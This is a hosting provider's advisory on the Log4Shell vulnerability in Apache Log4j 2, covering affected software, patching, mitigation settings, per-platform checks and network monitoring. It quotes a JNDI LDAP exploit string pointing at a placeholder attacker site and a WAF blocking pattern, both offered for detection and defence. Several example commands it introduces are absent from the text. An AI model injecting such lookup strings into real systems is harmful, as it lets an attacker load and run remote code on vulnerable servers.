QuickHostUK Managed Server customers have already had their servers patched. If you are running a custom application on the server that uses Log4J, please contact us as soon as possible.

Multiple versions of the Apache Log4j 2 library are affected by an unauthenticated remote code execution vulnerability (CVE-2021-44228).

The Apache Foundation developed Log4j 2 as an open-source Java logging library. Many applications use it and it is a dependency for numerous services. A wide range of enterprise and custom applications are included.

In enterprise Java software, Log4j 2 is frequently used. It is part of Apache frameworks including the following:

• Apache Struts2
• Apache Druid
• Apache Swift
• Apache Flink
• Apache Solr

An application is vulnerable if untrusted user input is passed to a vulnerable version of the Log4j logging library.

Multiple vulnerabilities affect version 1 of the Log4j library, which is no longer supported. Developers are urged to upgrade to the latest version of Log4j 2.

We recommend the following priority actions

Install the latest updates as soon as possible wherever Log4j is used

All organizations using software that includes Log4j should prioritize this task.

Here is a list of products vulnerable to the Log4j 2 library, which is frequently used in software:

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
https://github.com/NCSC-NL/log4shell/tree/main/software

If your specific product isn’t listed, you can use the instructions below to determine if Log4j is installed. Follow the vendor’s guidance on updating your software or applying mitigations if your product is listed. A new product may also appear on the list, so keep refreshing the page. You may request that your product be added to the list if it is not listed but is vulnerable.

In cases where vendors have not provided updates to products, Log4j 2 (2.10 and later) can be mitigated by setting log4j2.formatMsgNoLookups to true or removing the JndiLookup class from the classpath.

Discover instances of Log4j

cPanel Servers

The only service that uses Log4j on a stock cPanel server is cpanel-dovecot-solr. cPanel dovecot solr is a useful feature that helps to index and search documents and email attachments on IMAP mailboxes. cPanel dovecot solr only listens on localhost. Hence, it is not publicly accessible. The only way to interact with it is via IMAP search, and IMAP requires authentication, so It’s safe to leave it in place, however, you can uninstall it from WHM if you wish.

Check if your server has been patched:

As we can see, this was already patched on Friday 10th December 2021.

Plesk Servers

Plesk does not use Java internally, therefore this vulnerability does not affect Plesk. Since Tomcat support was removed from Plesk 17.8, Plesk no longer supports users’ Java-based applications.

Windows Servers

Microsoft claims the majority of attacks in recent days have been a result of mass scanning conducted by attackers in order to identify vulnerable systems, as well as scanning conducted by security researchers. These strings might appear in a web request log as part of an attack pattern: $ { jndi:ldap :// [attacker site] /a}

To evade detection based on patterns, attackers obfuscate these requests. There have been examples of things like running an upper or lower command within an exploitation string.

Microsoft recommends using Microsoft 365 Defender to help protect against and detect attacks

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Microsoft Defender Antivirus detects components and behaviours related to this threat.

Other or custom setups

You should also determine whether Log4j is installed elsewhere. A Java application can include all of its dependent libraries within its installation. You can search the file system for log4j.

The search should include searching inside EAR, JAR, and WAR files. For instance:

It is also possible to search within a dependency or package manager. For instance:

Additionally, you can check if your system is already patched

There may be multiple copies of Log4j present, each of which will need to be updated or mitigated.

Monitoring and blocking of networks as a protective measure

• The use of Web Application Firewalls (WAFs) can provide protection against this vulnerability. You might want to block URLs containing strings such as jndi:ldap. Variations of the exploit string may circumvent current WAF rules. As a result, WAFs cannot serve as the only means of security.
• Log files for services using affected Log4j versions could contain user-controlled strings. For instance, jndi:ldap.
• Using monitoring software like Netflow, you can look for internally initiated LDAP connections to external destinations that were not seen before 10 December 2021. This might indicate that a vulnerability has been exploited. Use the above methods to search for Log4j on the initiating host.